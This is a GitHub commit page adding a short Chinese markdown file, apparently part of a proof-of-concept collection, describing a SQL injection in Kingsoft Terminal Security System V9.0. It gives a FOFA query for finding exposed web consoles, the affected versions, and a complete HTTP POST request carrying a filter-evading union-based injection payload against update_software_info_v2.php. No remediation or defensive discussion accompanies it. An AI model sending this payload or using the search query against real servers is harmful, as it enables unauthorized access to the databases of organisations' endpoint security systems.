Create 金山终端安全系统V9.0 SQL注入漏洞.md
This commit is contained in:
wy876
GitHub
parent
6419808fae
commit
fc8c38e36c
19
金山终端安全系统V9.0 SQL注入漏洞.md
Normal file
19
金山终端安全系统V9.0 SQL注入漏洞.md
Normal file
@ -0,0 +1,19 @@
|
|||||||
|
## 金山终端安全系统V9.0 SQL注入漏洞
|
||||||
|
|
||||||
|
## fofa查询语法
|
||||||
|
```
|
||||||
|
app="金山终端安全系统V9.0Web控制台"
|
||||||
|
```
|
||||||
|
|
||||||
|
## 影响版本
|
||||||
|
金山终端安全系统 V9.0 < V9.SP1.E1008
|
||||||
|
|
||||||
|
## POC
|
||||||
|
```
|
||||||
|
POST /inter/update_software_info_v2.php HTTP/1.1
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Host: ip:port
|
||||||
|
Content-Length: 81
|
||||||
|
|
||||||
|
type=--1E0union/**/se#lect-1E0,2,1,user(),5,6,7,8--&key=123&pageCount=1&curPage=1
|
||||||
|
```
|
||||||
Loading…
x
Reference in New Issue
Block a user